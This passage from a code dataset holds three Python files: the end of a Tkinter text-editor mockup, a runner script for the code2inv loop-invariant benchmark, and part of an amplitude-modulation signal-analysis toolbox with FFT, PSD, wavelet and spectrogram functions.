Button(frame1, text = \"Sample_Text_Editor.py\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb5.grid(row=5 , column=0, sticky=\"w\")\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=2 , column=1 , sticky=\"w\") # Space between 'file' and 'edit'\r\n\r\nb6 = Button(frame1, text = \"Edit\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb6.grid(row=0 , column= 2)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=2 , column=3 , sticky=\"w\") # Space between 'edit' and 'selection'\r\n\r\nb7 = Button(frame1, text = \"Selection\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb7.grid(row=0 , column=4)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'selection' and 'view'\r\nspace.grid(row=2 , column=5 , sticky=\"w\")\r\n\r\nb8 = Button(frame1, text = \"View\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb8.grid(row=0, column=6)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'view' and 'go'\r\nspace.grid(row=2 , column=7 , sticky=\"w\")\r\n\r\nb9 = Button(frame1, text = \"Go\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb9.grid(row=0, column=8)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'go' and 'run'\r\nspace.grid(row=2 , column=9 , sticky=\"w\")\r\n\r\nb10 = Button(frame1, text = \"Run\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb10.grid(row=0, column=10)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'run' and 'terminal'\r\nspace.grid(row=2 , column=11 , sticky=\"w\")\r\n\r\nb11 = Button(frame1, text = \"Terminal\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb11.grid(row=0, column=12)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'terminal' and 'help'\r\nspace.grid(row=2 , column=13 , sticky=\"w\")\r\n\r\nb12 = Button(frame1, text = \"Help\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb12.grid(row=0, column=14)\r\n\r\nframe2 = Frame(root, bg = \"black\", borderwidth=5) # 2nd Frame for bitmaps at 'nw' side\r\nframe2.grid(row=0,column=0,sticky=\"nw\")\r\n\r\nb14 = Button(frame2, bitmap=\"question\",border=12, bg=\"red\")\r\nb14.grid(row=0 , column=0)\r\n\r\nb15 = Button(frame2, bitmap=\"questhead\",border=12, bg=\"red\")\r\nb15.grid(row=1 , column=0)\r\n\r\nb16 = Button(frame2, bitmap=\"info\",border=12, bg=\"red\")\r\nb16.grid(row=2 , column=0)\r\n\r\nb17 = Button(frame2, bitmap=\"warning\",border=12, bg=\"red\")\r\nb17.grid(row=3 , column=0)\r\n\r\nb18 = Button(frame2, bitmap=\"hourglass\",border=12, bg=\"red\")\r\nb18.grid(row=4 , column=0)\r\n\r\nb19 = Button(frame2, bitmap=\"gray50\",border=12, bg=\"red\")\r\nb19.grid(row=5 , column=0)\r\n\r\nroot.mainloop()\r\n# Menu widget required to decorate it more beautifully\r\n","repo_name":"ShadProgrammer/My-Tkinter-Codes","sub_path":"Sample_Text_Editor.py","file_name":"Sample_Text_Editor.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9192766867","text":"from gcln_code2inv import gcln_infer\nfrom condition_parser import parse_conditions, fast_checker\nimport time\nimport sys, os\nfrom z3 import Real, And\nimport numpy as np\n\n\ndef run_code2inv_problem(i):\n verbose=False\n solved=False\n if i in [26, 27, 31, 32, 61, 62, 72, 75, 106]:\n print(i,'theoretically unsolvable')\n return True, 0\n\n start_time = time.time()\n attempts = 0\n 
first_time = True\n max_epoch = 2000\n I = None\n while (solved == False):\n attempts += 1\n if attempts > 10:\n # print('failed', i)\n # return False\n break\n\n if first_time:\n solved, I = fast_checker(i)\n if solved:\n break\n else:\n non_loop_invariant = None\n if i in [110, 111, 112, 113]:\n non_loop_invariant = And(Real('sn') == 0, Real('i') == 1, Real('n') < 0)\n elif i in [118, 119, 122, 123]:\n non_loop_invariant = And(Real('sn') == 0, Real('i') == 1, Real('size') < 0)\n\n solved, I = gcln_infer(i, max_epoch=max_epoch, \n non_loop_invariant=non_loop_invariant) \n\n first_time = False\n max_epoch += 1000\n\n end_time = time.time()\n runtime = end_time - start_time\n\n print('Problem number:', i, 'solved?',solved, 'time:', runtime)\n if I is not None:\n print(I)\n return solved, runtime\n\nif __name__=='__main__':\n if not os.path.isdir('../benchmarks/code2inv/conditions'):\n print('preprocessing source files...')\n parse_conditions()\n if len(sys.argv) > 1:\n print('running problem', sys.argv[1])\n problem = int(sys.argv[1])\n run_code2inv_problem(problem)\n else:\n print('running entire code2inv benchmark, use python run_code2inv.py to run single problem')\n total_solved = 0\n total = 0\n unsolvable = 0\n runtimes = []\n for i in range(1, 134):\n solved, runtime = run_code2inv_problem(i)\n if i in [26, 27, 31, 32, 61, 62, 72, 75, 106]:\n unsolvable += 1\n else:\n total += 1\n total_solved += solved\n runtimes.append(runtime)\n print('Solved {}/{} solvable problems, {} theoretically unsolvable problems'.format(total_solved, total, unsolvable))\n print('Avg. Runtime: {:0.1f}s, Max Runtime: {:0.1f}s'.format(np.mean(runtimes), np.max(runtimes)))\n print()\n print('Summary:')\n print('Solved {}/{} solvable problems, {} theoretically unsolvable problems'.format(total_solved, total, unsolvable))\n print('Avg. Runtime: {:0.1f}s, Max Runtime: {:0.1f}s'.format(np.mean(runtimes), np.max(runtimes)))\n\n\n","repo_name":"jyao15/G-CLN","sub_path":"gcln_model/run_code2inv.py","file_name":"run_code2inv.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"45"} +{"seq_id":"70427126537","text":"\"\"\"\nAmplitude Modulation Analysis Toolbox\n\"\"\"\n\nimport numpy as np\nimport scipy.signal\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\ndef conv_m(a, b, mode='full'):\n \"\"\"Convolve a vector with collection of vectors.\n\n Convolve a 1D array `a` with each column of the 2D array `b`. \n \n Convolution is carried out with `scipy.signal.fftconvolve`\n \n Parameters\n ----------\n a : 1D array\n 1D array input\n \n b : 1D or 2D array_like\n 1D or 2D array input\n \n mode : str {'full', 'same'}, optional\n A string indicating the size of the output:\n\n ``full``\n The output is the full discrete linear convolution\n of the inputs. 
(Default)\n ``same``\n The output is the same size as `a`, centered\n with respect to the 'full' output.\n\n Returns\n -------\n c : 2D array\n A 2D array where each columns corresponds to the \n convolution of `a` and a column of `b`\n \n See Also\n --------\n `scipy.signal.fftconvolve()`\n \n \"\"\"\n # input vector 'a' to 1 dimension\n a = a.ravel()\n # number of samples vector 'a'\n siz_a = len(a)\n \n # input 'b' as 2D matrix [samples, columns]\n try:\n b.shape[1]\n except IndexError:\n b = b[:, np.newaxis]\n \n # number of samples and number of channels in input 'b'\n siz_b, col_b = b.shape\n \n # allocate space for result\n if mode == 'same':\n c = np.zeros((siz_a, col_b) , dtype = complex)\n elif mode == 'full':\n N = siz_a + siz_b - 1\n c = np.zeros((N , col_b), dtype = complex)\n \n # 1D convolutions per columns in 'b' \n for ix in range(0 , col_b):\n c[:,ix] = scipy.signal.fftconvolve(a, b[:,ix] , mode)\n \n return c\n\n\ndef epoching(data, samples_epoch, samples_overlap = 0):\n \"\"\"Divide an array in a colletion of smaller arrays\n \n Divides the `data` provided as [n_samples, n_channels] using the \n `size_epoch` indicated (in samples) and the `overlap_epoch` between \n consecutive epochs.\n \n Parameters\n ----------\n data : 2D array \n with shape (n_samples, n_channels)\n\n samples_epochs : \n number of samples in smaller epochs\n \n samples_overlap : \n number of samples for ovelap between epochs (Default 0)\n\n\n Returns\n -------\n epochs : 3D array \n with shape (samples_epoch, n_channels, n_epochs)\n \n remainder : 2D array \n with the remaining data after last complete epoch\n \n ix_center : 1D array\n indicates the index tha corresponds to the center of the nth epoch.\n\n \"\"\" \n # input 'data' as 2D matrix [samples, columns]\n try:\n data.shape[1]\n except IndexError:\n data = data[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = data.shape\n\n # Size of half epoch\n half_epoch = np.ceil(samples_epoch / 2 )\n\n # Epoch shift \n samples_shift = samples_epoch - samples_overlap\n\n # Number of epochs\n n_epochs = int(np.floor( (n_samples - samples_epoch) / float(samples_shift) ) + 1 )\n if n_epochs == 0:\n return np.array([]), data, np.array([])\n\n #markers indicates where the epoch starts, and the epoch contains samples_epoch rows\n markers = np.asarray(range(0,n_epochs)) * samples_shift\n markers = markers.astype(int)\n\n #Divide data in epochs\n epochs = np.zeros((samples_epoch, n_channels, n_epochs))\n ix_center = np.zeros((n_epochs,1))\n\n for i_epoch in range(0,n_epochs):\n epochs[:,:,i_epoch] = data[ markers[i_epoch] : markers[i_epoch] + samples_epoch ,:]\n ix_center[i_epoch] = markers[i_epoch] -1 + half_epoch\n \n if ( (markers[-1] + samples_epoch) < n_samples): \n remainder = data[markers[-1] + samples_epoch : n_samples, :]\n else:\n remainder = np.asarray([])\n \n return epochs, remainder, ix_center.astype(int)\n\ndef iepoching(epochs, shift_epoch):\n \"\"\"\n Merges a set of epochs [n_samples_epoch, n_channels] into \n the complete signal(s) x [n_samples, n_channels] taking into account\n the shift between consecutive epochs\n \n Parameters\n ----------\n epochs : 2D array_like with shape (n_samples, n_channels)\n shift_epoch : number of samples in smaller epochs\n\n Returns\n -------\n x : 2D array with shape (samples_epoch, n_channels, n_epochs)\n\n \"\"\"\n \n # obtain parameters\n (size_epoch, n_channels, n_epochs) = epochs.shape\n n_samples = (shift_epoch * (n_epochs - 1)) + size_epoch\n ix = 
np.arange(n_epochs) * shift_epoch\n \n # merging matrix\n merging = np.zeros((n_samples, n_channels, 2))\n # Number of epochs that contribute for a specific point\n n_merging = np.zeros((n_samples, n_channels, 2))\n \n for i_epoch in range(n_epochs):\n merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = epochs[:, :, i_epoch]\n n_merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1] = 1\n merging[:,:,0] = np.sum(merging, axis=2)\n n_merging[:,:,0] = np.sum(n_merging, axis=2)\n merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = 0\n n_merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = 0\n \n x = np.divide(merging[:,:,0], n_merging[:,:,0]) \n return x \n\n\ndef cmorlet_wavelet(x, fs, freq_vct, n=6, normalization=True):\n \"\"\"Perform the continuous wavelet (CWT) tranform using the complex Morlet wavelet.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or \n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n normalization : Scale each wavelet to have energy equal to 1\n (Default True) \n\n\n Returns\n -------\n wcoef : Complex wavelet coefficients \n 2D array with shape [n_samples, n_freqs] if `x` is 1D array\n 3D array with shape [n_samples, n_freqs, n_channels] if `x` is 2D array\n \n wfam : 2D array with shape [n_wavelet_samples, n_freqs] where each column\n corresponds to the a member of the wavelet family\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # number of wavelets\n n_freqs = len(freq_vct)\n\n # number of samples for Wavetet family\n # This is equal to the number of samples needed to represent 2*n cycles \n # of a sine with frequency = fres(1)[Hz], sampled at fs [Hz]. \n # This is done to ensure that every wavelet in the wavalet family will be \n # close to 0 in the negative and positive edges\n n_samples_wav = np.round( (2*n/freq_vct[0])*fs )\n\n # The wavelet will be symmetrical around 0\n if np.mod(n_samples_wav,2) == 0: # even samples\n n_samples_wav = n_samples_wav + 1\n\n # create time vector for Wavelet family\n half = np.floor(n_samples_wav/2)\n time = np.arange(-half, half+1)/fs\n\n # initialize Wavelet family matrix\n wfam = np.zeros([len(time), n_freqs], dtype=complex)\n\n # for each frequency defined in FREQ, create its respective Wavelet\n for iwav in range(n_freqs):\n s = n/(2*np.pi*freq_vct[iwav])\n gaussian_win = np.exp((-time**2)/(2*s**2))\n sinwave = np.exp(2*np.pi*1j*freq_vct[iwav]*time)\n if normalization:\n # each wavelet has unit energy sum(abs(wavelet).^2)) = 1\n A = 1. / ((s**2) * np.pi) ** (1./4)\n else:\n A = 1.\n # Complex Morlet wavelet\n wfam[:, iwav] = A * sinwave * gaussian_win\n\n wcoef = np.zeros((n_samples, n_freqs, n_channels), dtype=complex)\n\n if n_channels == 1:\n # one channel\n tmp = conv_m(x, wfam, 'same')\n wcoef[:, :, 0] = tmp \n else:\n # convolution between signal X and the each Wavelt in the Wavelet family\n for i_channel in range(n_channels):\n x_tmp = x[:, i_channel]\n tmp = conv_m(x_tmp, wfam, 'same')\n wcoef[:, :, i_channel] = tmp \n\n return wcoef, wfam\n\n\ndef rfft(x, n=None, dim=None):\n \"\"\"Real Fast Fourier Transform.\n \n Considering a real signal A with B = fft(A), B is Hermitian symmetric,\n i.e. 
B(-1) = conj(B(1)), therefore the complete spectrum B\n can be found by using with only the non-negative frequencies in B\n \n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n \n n : Number of samples to compute the FFT\n (Default = n_samples in array x) \n dim : Dimension to compute the RFFT \n (Default: first array dimension whose size does not equal 1)\n\n Returns\n -------\n y : Non-negative complex spectrum of `x` with shape as `x`\n \n See Also\n --------\n `np.fft.fft()`\n \n \"\"\"\n\n # shape of x\n shape_x = x.shape\n # number of dimentions\n dim_x = len(shape_x)\n \n # limits to 2-dimention data\n assert dim_x<=2\n \n # check shape of X, and set n and dim defaults\n if dim_x == 1:\n dim_def = 0\n else:\n if shape_x[0] == 1:\n # shape [1, n_samples] (row vector)\n dim_def = 1\n elif shape_x[1] == 1:\n # shape [n_samples, 1] (column vector)\n dim_def = 0 \n else:\n # X is a 2D Matrix, a shape [n_samples, n_channels] is asummed\n dim_def = 0\n \n if dim is None:\n dim = dim_def\n \n if n is None:\n n = shape_x[dim]\n \n # FFT\n yc = np.fft.fft(x, n=n, axis=dim)\n \n # points to keep\n if n%2 == 0: \n # even case\n n_new = int((n / 2) + 1)\n else:\n # odd case\n n_new = int((n + 1) / 2)\n \n if dim_x == 1:\n y = yc[0:n_new]\n else:\n if dim == 0:\n y = yc[0:n_new,:] \n else:\n y = yc[:, 0:n_new]\n \n return y\n\ndef irfft(y, n=None, dim=None):\n '''\n The IRFFT function returns the Inverse DFT (using the RFFT algorithm)of\n a spectrum Y containing ONLY the positive frequencies, with the\n assumption than Y is the positive half of a Hermitian Symmetric spectrum\n from a real signal X.\n \n Parameters\n ----------\n y : 1D or 2D array with the positive spectrum of \n real-valued signals with shape (n_samples, n_channels)\n n : Number of samples in the original x signals \n N not provided. Y is assumed be obtained from a signal X with even number fo samples \n dim : Dimension to compute the IRFFT (Default: first array dimension whose size does not equal 1)\n\n Returns\n -------\n x : Real-valued signal(s) \n \n See Also\n --------\n `np.fft.ifft()`\n '''\n \n # verify y\n shape_y = y.shape\n # number of dimentions\n dim_y = len(shape_y)\n \n # limits to 2-dimention data\n assert dim_y<=2\n \n # check shape of y, and set n and dim defaults\n if dim_y == 1:\n dim_def = 0\n else:\n if shape_y[0] == 1:\n # shape [1, n_samples] (row vector)\n dim_def = 1\n elif shape_y[1] == 1:\n # shape [n_samples, 1] (column vector)\n dim_def = 0 \n else:\n # X is a 2D Matrix, a shape [n_samples, n_channels] is asummed\n dim_def = 0\n \n if dim is None:\n dim = dim_def\n \n # verify 'n' number-of-samples parameter\n if n is None:\n print('N not provided. 
Y is assumed be obtained from a signal X with even number fo samples')\n n_half = shape_y[dim]\n n = (n_half - 1) * 2\n \n # reconstruct missing half of Spectrum\n if np.mod(n,2) == 0:\n # number of samples is even\n n_half = (n / 2) + 1\n ix_limit = slice(1, -1 )\n else:\n # number of samples is odd\n n_half = (n + 1) / 2\n ix_limit = slice(1, None)\n\n if dim_y == 1:\n # spectrum in y is 1D\n y_neg = np.conj(np.flipud(y[ix_limit]))\n yc = np.concatenate((y, y_neg), axis=0)\n else:\n # check shape of y, and add negative frequencies\n if dim == 0:\n # spectra in y are column wise\n y_neg = np.conj(np.flipud(y[ix_limit, :]))\n yc = np.concatenate((y, y_neg), axis=0)\n else:\n # spectra in y are row-wise\n y_neg = np.conj(np.fliplr(y[:, ix_limit]))\n yc = np.concatenate((y, y_neg), axis=1)\n \n x = np.real(np.fft.ifft(yc, n, dim))\n \n return x\n\n\ndef rfft_psd(x, fs, n_fft=None, win_function = 'hamming', channel_names=None):\n \"\"\" This function computes the PSD for one or a set of REAL signals.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n win_function : Window function applied to the signal \n (Default 'Hamming')\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n\n Returns\n -------\n psd_data : Dictionary with PSD data, with the elements:\n rFFT\n First half of the FFT(x) (u), scaled by the Window RMS \n PSD\n Power Spectrum Density (u^2 / Hz) \n fs\n Sampling frequency (Hz)\n freq_axis\n Frequency axis for rFFT and PSD (Hz)\n freq_delta\n Frequency axis step (Hz)\n n_samples\n Number of samples of the signal or signals 'x'\n n_fft\n Number of elements utilized to perform FFT\n win_function\n Window applied to the data in 'x'\n channel_names \n Names of channels\n \n \"\"\"\n\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'n_fft' argument\n if n_fft is None:\n n_fft = n_samples\n\n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # windowing data\n win = scipy.signal.get_window(win_function, n_samples, fftbins=False)\n win.shape = (n_samples, 1)\n win_rms = np.sqrt(np.sum(np.square(win)) / n_samples)\n win_mat = np.tile(win, n_channels)\n x = np.multiply(x, win_mat)\n\n # real FFT with zero padding if n_fft ~= n_samples\n Xt = rfft(x, n_fft)\n # spectrum scaled by window RMS\n Xt = Xt / win_rms\n # power spectrum\n X_pwr = abs(np.multiply(Xt, np.conj(Xt)))\n X_pwr = X_pwr * (1/np.square(n_fft))\n\n # adjust for even and odd number of elements\n if n_fft % 2 != 0:\n # odd case\n n_freqs = (n_fft + 1) / 2\n # double all frequency components except DC component \n X_pwr[1:, :] = X_pwr[1:, :] * 2\n \n else:\n # even case \n n_freqs = (n_fft / 2) + 1\n # double all frequency components except DC and fs/2 components\n X_pwr[1:-1, :] = X_pwr[1:-1, :] * 2\n \n # frequency axis step\n f_delta = (fs / n_fft)\n # scale PSD with the frequency step\n psd = np.divide(X_pwr, f_delta)\n\n # frequency axis for spectrum\n n_freqs = int(n_freqs)\n f_axis = np.asarray(range(0, n_freqs)) * f_delta\n \n # output 'psd_data' dictionary\n psd_data = {}\n psd_data['rFFT'] = 
Xt\n psd_data['PSD'] = psd\n psd_data['fs'] = fs\n psd_data['freq_axis'] = f_axis\n psd_data['freq_delta'] = f_delta\n psd_data['n_samples'] = n_samples\n psd_data['n_fft'] = n_fft\n psd_data['win_function'] = win_function\n psd_data['channel_names'] = channel_names\n \n return psd_data\n\ndef irfft_psd(psd_data):\n \"\"\"Compute the inverse PSD for one or a set of REAL signals.\n \n Parameters\n ----------\n psd_data : Structure with PSD data, created with rfft_psd()\n \n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n\n \"\"\"\n # Load data from PSD structure\n rFFT_data = psd_data['rFFT']\n f_ax = psd_data['freq_axis']\n fs = psd_data['fs']\n win_function = psd_data['win_function']\n n_samples = psd_data['n_samples']\n n_channels = rFFT_data.shape[1]\n \n # Find the number of elements used for the rFFT\n if f_ax[-1] < fs/2:\n # elements for FFT was odd\n n_fft = (len(f_ax) * 2) - 1\n elif f_ax[-1] - fs/2 < 1000 * np.finfo(np.float64).eps:\n # elements for FFT was even\n n_fft = (len(f_ax) - 1) * 2\n \n # Window RMS\n win = scipy.signal.get_window(win_function, n_samples, fftbins=False)\n win.shape = (n_samples, 1)\n win_rms = np.sqrt(np.sum(np.square(win)) / n_samples)\n \n # IRFFT\n X = rFFT_data * win_rms\n x_tmp = irfft(X, n_fft)\n \n # Keep only n_samples points\n x = x_tmp[0 : n_samples + 1, :]\n \n # Un-Windowing\n win_mat = np.tile(win, n_channels)\n x = np.divide(x, win_mat)\n \n return x\n\ndef strfft_spectrogram(x, fs, win_size, win_shift, n_fft=None, win_function='hamming', channel_names=None):\n \"\"\"Compute the Short Time real FFT Spectrogram for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n win_size :\n Size of the sliding window for STFFF (samples)\n win_shift :\n Shift between consecutive windows (samples) \n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n win_function : Window function applied to the signal \n (Default 'Hamming')\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... 
n_channels) \n\n Returns\n -------\n spectrogram_data : Dictionary with Spectrogram data, with the elements:\n rFFT_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_spectrogram :\n PSD values for each window (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n time_axis :\n Time axis for rFFT_spectrogram and power_spectrogram (s) \n time_delta :\n Time axis step (s)\n win_size_samples :\n Size of the sliding window for STFFF (samples)\n win_shift_samples :\n Shift between consecutive windows (samples) \n n_fft :\n Number of elements utilized to perform FFT \n win_function :\n Window applied to the data in 'x' \n n_windows :\n Number of ST windows\n n_samples :\n Number of samples of the signal or signals 'x'\n channel_names \n Names of channels\n \n \"\"\"\n \n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'n_fft' argument \n if n_fft is None:\n n_fft = win_size\n\n # round win_size and win_shift\n win_size = round(win_size)\n win_shift = round(win_shift)\n\n # time axis step for Spectrogram\n t_delta = win_shift / fs\n\n # Create time vector 'time_vct' for signal 'x'\n time_vct = np.array(range(0, np.size(x, 0))) / fs\n\n \n # epoch signal or signals 'x'\n x_epoched, _ , ix = epoching(x, win_size, win_size - win_shift)\n\n # time axis for Spectrogram\n t_ax = time_vct[ix]\n\n # spectrogram parameters\n n_samples_win, n_channels, n_windows = x_epoched.shape\n\n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # compute PSD per window\n for i_window in range(0, n_windows):\n # ith epoch of the signal or signals\n x_epoch = (x_epoched[:, :, i_window])\n psd_struct = rfft_psd(x_epoch, fs, n_fft, win_function, channel_names)\n \n # initialize arrays for spectrogram data\n if i_window == 0:\n # frequency Axis for spectrogram\n f_ax = psd_struct['freq_axis']\n # delta Frequency\n f_delta = psd_struct['freq_delta']\n # initialize 'rFFT_spectrogram' and 'pwr_spectrogram'\n rFFT_spectrogram = np.zeros((n_windows, len(f_ax), n_channels), dtype = complex)\n pwr_spectrogram = np.zeros((n_windows, len(f_ax), n_channels))\n \n # rFFT data\n rFFT_spectrogram[i_window, :, :] = psd_struct['rFFT']\n # power data\n pwr_spectrogram[i_window, :, :] = psd_struct['PSD']\n\n # scale 'pwr_spectrogram' by number of windows and time delta\n pwr_spectrogram = pwr_spectrogram / (n_windows * t_delta)\n\n\n # output 'spectrogram_data' dictionary\n spectrogram_data = {}\n spectrogram_data['rFFT_spectrogram'] = rFFT_spectrogram\n spectrogram_data['power_spectrogram'] = pwr_spectrogram\n spectrogram_data['fs'] = fs\n spectrogram_data['freq_axis'] = f_ax\n spectrogram_data['freq_delta'] = f_delta\n spectrogram_data['time_axis'] = t_ax\n spectrogram_data['time_delta'] = t_delta\n spectrogram_data['win_size_samples'] = win_size\n spectrogram_data['win_shift_samples'] = win_shift\n spectrogram_data['n_fft'] = n_fft\n spectrogram_data['win_function'] = win_function\n spectrogram_data['n_windows'] = n_windows\n spectrogram_data['n_samples'] = n_samples \n spectrogram_data['channel_names'] = channel_names\n\n return spectrogram_data\n\ndef istrfft_spectrogram(spectrogram_data):\n \"\"\"Compute the inverse 
STFT spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n spectrogram_data : Structure with STFT spectrogram data, created with strfft_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n x_epoched = Segments form the signal or set of signals utilized to\n create the spectrogram in spectrogram_struct\n\n \"\"\"\n # Load data from Spectrogram structure\n rFFT_data = spectrogram_data['rFFT_spectrogram']\n win_size = spectrogram_data['win_size_samples']\n win_shift = spectrogram_data['win_shift_samples']\n \n # Generate psd_struct, to use irfft_psd()\n psd_struct = {}\n psd_struct['fs'] = spectrogram_data['fs']\n psd_struct['channel_names'] = spectrogram_data['channel_names']\n psd_struct['freq_axis'] = spectrogram_data['freq_axis']\n psd_struct['win_function'] = spectrogram_data['win_function']\n psd_struct['n_samples'] = win_size\n \n # Initialize rFFT_slice and x_epoched variables\n (n_windows, n_freqs, n_channels) = rFFT_data.shape\n rfft_slide = np.zeros((n_freqs, n_channels))\n x_epoched = np.zeros((win_size, n_channels, n_windows))\n \n for i_window in range(n_windows):\n # rFFT slice from spectrogram\n rfft_slide = rFFT_data[i_window, :, :]\n # Generate psd_struct, to use irfft_psd()\n psd_struct['rFFT'] = rfft_slide \n # ifft_psd from the rFFT data recovers the signal or set of signals 'x'\n x_tmp = irfft_psd(psd_struct)\n x_epoched[:, :, i_window] = x_tmp\n\n # Merge epoched data\n x = iepoching(x_epoched, win_shift);\n \n return x, x_epoched\n\ndef wavelet_spectrogram(x, fs, n_cycles=6, freq_vct=None, channel_names=None):\n \"\"\"Compute the Spectrogram using the Complex Morlet wavelet for one or a set of REAL signals 'x'. \n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... 
n_channels) \n\n Returns\n -------\n spectrogram_data : Dictionary with Spectrogram data, with the elements:\n wavelet_coefficients\n Coefficients of the Wavelet transformation (u) \n power_spectrogram :\n Power spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n time_axis :\n Time axis for rFFT_spectrogram and power_spectrogram (s) \n time_delta :\n Time axis step (s)\n n_cycles : \n Number of cicles used inside the Gaussian curve \n wavelet_kernels :\n Wavelet kernels used to obtain the wavelet coefficients\n n_samples :\n Number of samples of the signal or signals 'x'\n channel_names \n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'freq_vct' argument\n if freq_vct is None:\n freq_vct = np.array(range(1, int(np.floor(fs / 2) + 1)))\n \n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # Time delta\n t_delta = 1 / fs\n \n # Frequency delta\n f_delta = freq_vct[1] - freq_vct[0]\n\n # Create time vector 'time_vct' for signal 'x'\n time_vct = np.array(range(0, np.size(x, 0))) / fs\n\n # Number of samples\n n_samples = np.size(x, 0)\n\n # Wavelet transform\n wavelet_coefficients, wavelet_family = cmorlet_wavelet(x, fs, freq_vct, n_cycles)\n\n # Power from Wavelet coefficients\n power_spectrogram = np.square(np.abs(wavelet_coefficients))\n power_spectrogram = power_spectrogram * 2 / (fs * n_samples)\n\n # output 'spectrogram_data' dictionary\n spectrogram_data = {}\n spectrogram_data['wavelet_coefficients'] = wavelet_coefficients\n spectrogram_data['power_spectrogram'] = power_spectrogram\n spectrogram_data['fs'] = fs\n spectrogram_data['freq_axis'] = freq_vct\n spectrogram_data['freq_delta'] = f_delta\n spectrogram_data['time_axis'] = time_vct\n spectrogram_data['time_delta'] = t_delta\n spectrogram_data['n_cycles'] = n_cycles\n spectrogram_data['wavelet_kernels'] = wavelet_family \n spectrogram_data['n_samples'] = n_samples\n spectrogram_data['channel_names'] = channel_names\n\n return spectrogram_data\n\ndef iwavelet_spectrogram(spectrogram_data):\n \"\"\" Compute the inverse CWT Spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n spectrogram_data : Structure with CWT Spectrogram data, created with wavelet_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n x_epoched = Segments form the signal or set of signals utilized to\n create the spectrogram in spectrogram_struct\n\n \"\"\"\n \n # compute the scaling factor for each wavelet kernel\n s = spectrogram_data['n_cycles'] / ( 2 * 